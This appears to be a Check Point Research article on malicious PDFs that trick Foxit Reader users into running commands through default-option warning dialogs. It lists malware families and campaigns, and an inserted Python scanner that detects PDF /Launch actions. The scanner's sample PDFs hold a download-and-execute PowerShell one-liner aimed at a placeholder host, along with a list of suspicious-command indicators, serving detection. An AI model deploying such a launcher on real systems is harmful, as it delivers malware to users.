
Foxit PDF Reader “Flawed Design”: Hidden Dangers Lurking in Common Tools

by Eli Smadja, Head of Research, Check Point Research

PDF files have become an integral part of modern digital communication, having evolved into a standard format for presenting text, images, and multimedia content with consistent layout and formatting, irrespective of the software, hardware, or operating system used to view them.

Adobe Acrobat Reader is the dominant PDF viewer, but it is far from the only one: Foxit PDF Reader is a prominent alternative, with more than 700 million users in more than 200 countries.

Check Point Research has identified an unusual pattern of PDF exploitation that mainly targets users of Foxit Reader. The malicious PDF triggers a chain of security warnings designed to trick unsuspecting users into executing harmful commands, and Check Point Research has observed variants of it being actively used in the wild.

Flaws within the Design
The technique abuses the flawed design of the warning messages in Foxit Reader: the default option each dialog offers is the most harmful one. Once a careless user proceeds twice with the default option, the exploit triggers, downloading a payload from a remote server and executing it.


Figure 1: Default option triggering malicious command.

This exploit has been used by multiple threat actors, for both e-crime and espionage. Check Point Research isolated and investigated three cases in depth, ranging from an espionage campaign to e-crime operations with multiple links and tools, amounting to impressive attack chains.

One of the most prominent campaigns leveraging this exploit was possibly carried out by the espionage group known as APT-C-35 / DoNot Team. Based on the specific malware deployed, the commands sent to the bots, and the victim data obtained, the threat actor is capable of running hybrid campaigns that target both Windows and Android devices, which in this case also resulted in a two-factor authentication (2FA) bypass.

This exploit has also been used by various cyber-crime actors to distribute some of the most prominent malware families, including:

  • VenomRAT

  • Agent-Tesla

  • Remcos

  • NjRAT

  • NanoCore RAT

  • Pony

  • Xworm

  • AsyncRAT

  • DCRat

Check Point Research followed the links of a campaign possibly distributed via Facebook, which resulted in an impressive attack chain that dropped an infostealer and two crypto-miners.


Figure 2: The Attack Chain

In another campaign, Check Point Research identified the threat actor @silentkillertv using two chained PDF files, one of which was hosted on a legitimate website, trello.com. The threat actor also sells malicious tools and, on the 27th of April, advertised this exploit.


Figure 3: Telegram Channel Advertisement

During the research, Check Point obtained several of the builders that actors use to create malicious PDF files taking advantage of this exploit. Most of the collected PDFs executed a PowerShell command that downloaded a payload from a remote server and then ran it, though on some occasions other commands were used.


Figure 4: PDF Commands Executed Analysis
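Because the whole attack reduces to a command string embedded in the PDF, the most reliable triage check is static: pull the command out of the file and judge it, independently of which reader opens it. The scanner below is an added example, not Check Point Research's tooling and not code from any of the builders described above. It assumes the command is carried in a PDF /Launch action dictionary (/F for the program, /P for its parameters), reachable through /OpenAction so it fires when the document opens; the article does not spell out which PDF feature the builders use, so treat that as an assumption. The sample PDFs, the example.invalid URL and the indicator list are constructed for this example.

```python
import re
from dataclasses import dataclass, field

# Substrings that, inside a /Launch action, point at download-and-execute
# behaviour. The list is an assumption made for this example; tune it locally.
SUSPICIOUS = (
    "powershell", "cmd.exe", "cmd /c", "iwr ", "invoke-webrequest",
    "downloadstring", "downloadfile", "-enc", "http://", "https://",
    "mshta", "wscript", "cscript", "certutil", "bitsadmin", "curl ",
)

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)  # one indirect object
STR_RE = rb"(\((?:[^()\\]|\\.)*\)|<[0-9A-Fa-f\s]*>)"  # literal "(...)" or hex "<...>" string
F_RE = re.compile(rb"/F\s*" + STR_RE, re.S)   # program to launch
P_RE = re.compile(rb"/P\s*" + STR_RE, re.S)   # its command-line parameters
OPEN_RE = re.compile(rb"/OpenAction\s+(\d+)\s+\d+\s+R")  # action that fires on open


@dataclass
class Finding:
    object_id: int
    auto_open: bool   # reachable from /OpenAction, so it fires as the file opens
    file: str         # the /F target, e.g. cmd.exe
    params: str       # the /P parameters, e.g. the PowerShell one-liner
    indicators: list = field(default_factory=list)


def decode_pdf_string(raw: bytes) -> str:
    """Decode a PDF literal or hex string to text (common escapes only)."""
    if raw.startswith(b"<"):
        digits = re.sub(rb"\s", b"", raw[1:-1])
        if len(digits) % 2:
            digits += b"0"  # PDF pads an odd trailing nibble with zero
        return bytes.fromhex(digits.decode("ascii")).decode("latin-1")
    escapes = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f"}
    body = re.sub(rb"\\(.)", lambda m: escapes.get(m.group(1), m.group(1)),
                  raw[1:-1], flags=re.S)
    return body.decode("latin-1")


def scan_pdf(data: bytes) -> list[Finding]:
    """Return one Finding per /Launch action, with the command it would run."""
    auto_refs = {int(n) for n in OPEN_RE.findall(data)}
    findings = []
    for m in OBJ_RE.finditer(data):
        obj_id, body = int(m.group(1)), m.group(3)
        if not re.search(rb"/S\s*/Launch\b", body):
            continue
        fm, pm = F_RE.search(body), P_RE.search(body)
        file = decode_pdf_string(fm.group(1)) if fm else ""
        params = decode_pdf_string(pm.group(1)) if pm else ""
        hits = [s for s in SUSPICIOUS if s in f"{file} {params}".lower()]
        auto = obj_id in auto_refs or b"/OpenAction" in body  # referenced or inline
        findings.append(Finding(obj_id, auto, file, params, hits))
    return findings


def verdict(data: bytes) -> str:
    """Collapse the findings into one triage label."""
    findings = scan_pdf(data)
    if not findings:
        return "clean"
    if any(f.indicators for f in findings):
        return "malicious"
    return "suspicious"  # a /Launch action, but nothing obviously hostile in it


# Constructed samples, not in-the-wild files: a download-and-execute one-liner in a
# literal string, the same idea with hex-encoded parameters, and a file with no action.
# example.invalid is a reserved name that never resolves.
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [] /Count 0 >>
endobj
4 0 obj
<< /Type /Action /S /Launch /Win << /F (cmd.exe) /P (/c powershell -w hidden -c "iwr http://example.invalid/p.exe -OutFile $env:TEMP\\\\p.exe; & $env:TEMP\\\\p.exe") >> >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""
SAMPLE_HEX = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /OpenAction << /S /Launch /F (cmd.exe) /P <706f7765727368656c6c202d632063616c63> >> >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""
BENIGN_PDF = b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog >>\nendobj\ntrailer\n<< /Root 1 0 R >>\n%%EOF\n"

if __name__ == "__main__":
    for name, blob in (("literal", SAMPLE_PDF), ("hex", SAMPLE_HEX), ("benign", BENIGN_PDF)):
        print(name, verdict(blob), [(x.object_id, x.auto_open, x.params) for x in scan_pdf(blob)])
```

Run it directly to print a verdict and the recovered command for each constructed sample. Two caveats for real files: the regexes only see objects stored in clear, so a PDF that tucks the action into a FlateDecode object stream must be inflated first (pdf-parser.py, peepdf or qpdf with --object-streams=disable all do this); and the decoder handles literal and hex strings but not every escape form, so treat a /Launch whose parameters fail to decode as suspicious rather than clean.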

While this "exploit" does not fit the classical definition of an exploit that triggers malicious activity on its own, it is more accurately categorised as a form of "phishing" or manipulation aimed at Foxit PDF Reader users, coaxing them into habitually clicking "OK" without understanding the risks involved.

The threat actors range from e-crime to APT groups, and the underground ecosystem has taken advantage of this "exploit" for years. It had been "rolling undetected" because most AV engines and sandboxes analyse PDFs with the major player among PDF readers, Adobe, so the Foxit-specific behaviour never surfaces during analysis. The high infection rate and low detection rate allow malicious PDFs to be distributed via many untraditional channels, such as Facebook, without being stopped by any detection rules. Check Point Research reported the issue to Foxit, which acknowledged it and stated that it would be resolved in version 2024.3.

As social engineering tactics grow more sophisticated, users need to stay informed and vigilant, exercise caution, and implement robust security measures, such as multi-factor authentication and security awareness training, to reduce the risk of falling victim to such attacks.

